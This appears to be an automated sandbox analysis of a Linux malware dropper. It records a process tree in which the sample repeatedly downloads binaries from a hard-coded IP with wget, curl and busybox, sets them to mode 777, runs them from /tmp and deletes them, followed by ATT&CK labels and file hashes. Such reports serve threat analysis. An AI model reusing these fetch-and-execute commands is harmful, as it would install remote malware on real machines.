/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1636
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1642
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1648
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1654
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1660
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1662
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1666
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1669
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1670
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1672
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1675
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1678
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1681
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97